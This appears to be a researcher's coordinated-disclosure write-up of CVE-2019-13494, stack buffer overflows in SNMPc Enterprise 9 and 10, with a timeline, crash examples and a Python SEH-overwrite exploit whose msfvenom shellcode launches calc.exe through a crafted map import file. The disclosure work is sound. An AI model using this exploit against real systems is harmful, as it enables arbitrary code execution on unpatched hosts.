(CVE-2019-13494) SNMPc Enterprise Edition 9 & 10 Stack Based Buffer Overflow
Background:
On the 27th May 2019 I discovered a number of stack based buffer overflows in Castle Rock Computing’s SNMPc Enterprise Edition 9 & 10. Exploitation of the these vulnerabilities allows an attacker to execute arbitrary code on the targeted system/s.
Castle Rock Computing’s (CRC) SNMPc Enterprise 10 “is a secure distributed Network Management System which delivers proactive real-time monitoring for your entire network infrastructure. Advanced product features and legendary ease of use have led to over 120,000 network managers trusting SNMPc to monitor their mission critical networks“. Further information about the company and product can be found at the following URL: https://www.castlerock.com/products/snmpc/
Vulnerable versions of CRC’s SNMPc Enterprise 9 & 10 software contain a number of stack-based buffer overflow conditions where the overwritten buffer is allocated on the stack. An attacker may leverage this vulnerability to execute arbitrary code on the targeted system/s under the context of the user.
Customers using CRC’s SNMPc Enterprise 9 or 10 software are strongly advised to address these vulnerabilities by upgrading to either SNMPc v10.0.9 or SNMPc v9.0.12.1 available from Castle Rock Computing’s website: https://www.castlerock.com/
Exploit difficulty:
An attacker must have low privileged authenticated access to the local target system in order to exploit this vulnerability, or have the ability to social engineer the user in order to accept the malformed Map Objects text file.
An attacker who successfully exploits the stack-based buffer overflow vulnerabilities can execute arbitrary code on the target system with the same privilege rights and context of the user running the process.
Disclosure Timeline:
27 May 2019
– Stack-based buffer overflows discovered. Further testing commenced.
07 June 2019
– Emailed Castle Rock Computing (CRC) requesting an email address to disclose vulnerabilities.
– CRC created an incident number (CRC285149) and provided requested details
10 June 2019
– Vulnerability disclosed to CRC. 45 day disclosure time frame allocated (25 July 2019 public disclosure date).
– CRC acknowledged receipt of disclosure email
11 June 2019
– CRC engineers released patch for vulnerable binaries
– Retested patched binaries and confirmed with CRC that stack-based buffer overflow vulnerabilities have been fixed
12 June 2019
– CRC advised software build 10.0.9 is scheduled for release around July 8th
2 July 2019
– CRC advised path date of July 8th still planned
– Mutual agreement that CVE-ID will be requested by myself from Mitre once CRC confirm date
10 July 2019
– CRC have advised that patch now available on their website
– CVE-ID requested
11 July 2019
– CVE-2019-13494 allocated by Mitre
– Public disclosure of vulnerability
Details:
Product: SNMPc Enterprise
Version: Latest version 9 & 10 and prior
Vendor: Castle Rock Computing
CVE-ID: CVE-2019-13494
CWE-ID: CWE-121 Stack-based Buffer Overflow
A number of program executables have been individually tested and can be successfully exploited when overwriting the buffer in the vulnerable version of CRC’s SNMPc Enterprise 10.
The nodeimp.exe
executable is called when a user imports Map Objects from a text file within the SNMPc Management Console (SNMPc Management Console: File > Import > Map Objects From Text File
). This executable is vulnerable to stack-based buffer overflow when the imported map text file contains an overly large string in variables within the text file.
Example map text file:
1 2 |
Name,Type,Address,ObjectID,Description,ID,Group1,Group2,Icon,Bitmap,Bitmap Scale,Shape/Thickness,Parent,Coordinates,Linked Nodes,Show Label,API Exec,MAC,Polling Agent,Poll Interval,Poll Timeout,Poll Retries,Status Variable,Status Value,Status Expression,Services,Status,Get Community,Set Community,Trap Community,Read Access Mode,Read/Write Access Mode,V3 NoAuth User,V3 Auth User,V3 Auth Password,V3 Priv Password"Root Subnet","Subnet","","","","2","000=Unknown","","auto.ico","","2","Square","(NULL)","(0,0)","N/A","True","auto.exe","00 00 00 00 00 00","127.0.0.1","30","2","2","","0","0","","Normal-Green","public","netman","public","SNMP V1","SNMP V1","","","","" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa","Device","127.0.0.1","1.3.6.1.4.1.29671.2.107","","3","000=Unknown","000=Unknown","auto.ico","","2","Square","Root Subnet(2)","(-16,-64)","N/A","True","auto.exe","00 00 00 00 00 00","127.0.0.1","30","2","2","","0","=","","Normal-Green","public","netman","public","SNMP V1","SNMP V1","","","","" |
The following executables are vulnerable to the stack-based buffer overflow via the command line when supplying an overly large string to the address, user, or pass variable arguments:
grpadd.exe
grpnext.exe
mapattr.exe
mapfind.exe
mapnext.exe
rptadd.exe
rptattr.exe
rptnext.exe
snmpget.exe
snmpset.exe
snmptest.exe
Example:
1 2 3 4 5 6 7 |
C:\Program Files (x86)\SNMPc Network Manager>grpnext.exe -a aaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa |
The polldump.exe
executable is vulnerable to the stack-based buffer overflow via the command line when supplying an overly large string as the poller argument.
Example:
1 2 3 4 5 6 7 |
C:\Program Files (x86)\SNMPc Network Manager>polldump aaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa |
Proof of Concept:
The following proof of concept python code will create the evil Map Objects Import file which can then be imported into SNMPc to trigger the buffer overflow in the nodeimp.exe process and execute calc.exe as a POC exploit.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 |
#--------------------------------------------------------------------# # Exploit: SNMPc Enterprise Edition (9 & 10) (Mapping File Name BOF) # # Exploit Author: @xerubus | mogozobo.com # # Vendor Homepage: https://www.castlerock.com/products/snmpc/ # # CVE-ID: CVE-2019-13494 # # Full write-up: https://www.mogozobo.com/?p=3534 # #--------------------------------------------------------------------# import sys, os os.system('clear') print("""\ _ _ ___ (~ )( ~) / \_\ \/ / | D_ ]\ \/ -= SNMPc_Mapping_BOF by @xerubus =- | D _]/\ \ -= We all have something to hide =- \___/ / /\ \\ (_ )( _) @Xerubus """) filename="evilmap.csv" junk = "A" * 2064 nseh = "\xeb\x07\x90\x90" # short jmp to 0018f58d \xeb\x07\x90\x90 seh = "\x05\x3c\x0e\x10" # 0x100e3c05 ; pop esi # pop edi # ret (C:\program files (x86)\snmpc network manager\CRDBAPI.dll) # Pre-padding of mapping file. Note mandatory trailing character return. pre_padding = ( "Name,Type,Address,ObjectID,Description,ID,Group1,Group2,Icon,Bitmap,Bitmap Scale,Shape/Thickness,Parent,Coordinates,Linked Nodes,Show Label,API Exec,MAC,Polling Agent,Poll Interval,Poll Timeout,Poll Retries,Status Variable,Status Value,Status Expression,Services,Status,Get Community,Set Community,Trap Community,Read Access Mode,Read/Write Access Mode,V3 NoAuth User,V3 Auth User,V3 Auth Password,V3 Priv Password" "\"Root Subnet\",\"Subnet\",\"\",\"\",\"\",\"2\",\"000=Unknown\",\"\",\"auto.ico\",\"\",\"2\",\"Square\",\"(NULL)\",\"(0,0)\",\"N/A\",\"True\",\"auto.exe\",\"00 00 00 00 00 00\",\"127.0.0.1\",\"30\",\"2\",\"2\",\"\",\"0\",\"0\",\"\",\"Normal-Green\",\"public\",\"netman\",\"public\",\"SNMP V1\",\"SNMP V1\",\"\",\"\",\"\",\"\"\n" "\"") # Post-padding of mapping file. Note mandatory trailing character return. post_padding = ( "\",\"Device\",\"127.0.0.1\",\"1.3.6.1.4.1.29671.2.107\",\"\",\"3\",\"000=Unknown\",\"000=Unknown\",\"auto.ico\",\"\",\"2\",\"Square\",\"Root Subnet(2)\",\"(-16,-64)\",\"N/A\",\"True\",\"auto.exe\",\"00 00 00 00 00 00\",\"127.0.0.1\",\"30\",\"2\",\"2\",\"\",\"0\",\"=\",\"\",\"Normal-Green\",\"public\",\"netman\",\"public\",\"SNMP V1\",\"SNMP V1\",\"\",\"\",\"\",\"\"\n") # msfvenom —platform windows -p windows/exec cmd=calc.exe -b "\x00\x0a\x0d" -f c shellcode = ( "\xda\xcc\xd9\x74\x24\xf4\xba\xd9\xa1\x94\x48\x5f\x2b\xc9\xb1" "\x31\x31\x57\x18\x83\xc7\x04\x03\x57\xcd\x43\x61\xb4\x05\x01" "\x8a\x45\xd5\x66\x02\xa0\xe4\xa6\x70\xa0\x56\x17\xf2\xe4\x5a" "\xdc\x56\x1d\xe9\x90\x7e\x12\x5a\x1e\x59\x1d\x5b\x33\x99\x3c" "\xdf\x4e\xce\x9e\xde\x80\x03\xde\x27\xfc\xee\xb2\xf0\x8a\x5d" "\x23\x75\xc6\x5d\xc8\xc5\xc6\xe5\x2d\x9d\xe9\xc4\xe3\x96\xb3" "\xc6\x02\x7b\xc8\x4e\x1d\x98\xf5\x19\x96\x6a\x81\x9b\x7e\xa3" "\x6a\x37\xbf\x0c\x99\x49\x87\xaa\x42\x3c\xf1\xc9\xff\x47\xc6" "\xb0\xdb\xc2\xdd\x12\xaf\x75\x3a\xa3\x7c\xe3\xc9\xaf\xc9\x67" "\x95\xb3\xcc\xa4\xad\xcf\x45\x4b\x62\x46\x1d\x68\xa6\x03\xc5" "\x11\xff\xe9\xa8\x2e\x1f\x52\x14\x8b\x6b\x7e\x41\xa6\x31\x14" "\x94\x34\x4c\x5a\x96\x46\x4f\xca\xff\x77\xc4\x85\x78\x88\x0f" "\xe2\x77\xc2\x12\x42\x10\x8b\xc6\xd7\x7d\x2c\x3d\x1b\x78\xaf" "\xb4\xe3\x7f\xaf\xbc\xe6\xc4\x77\x2c\x9a\x55\x12\x52\x09\x55" "\x37\x31\xcc\xc5\xdb\x98\x6b\x6e\x79\xe5") print "[+] Building payload.." payload = "\x90" * 10 + shellcode print "[+] Creating buffer.." buffer = pre_padding + junk + nseh + seh + payload + "\x90" * 10 + post_padding print "[+] Writing evil mapping file.." textfile = open(filename , 'w') textfile.write(buffer) textfile.close() print "[+] Done. Import evilmap.csv into SNMPc and A Wild Calc Appears!\n\n" |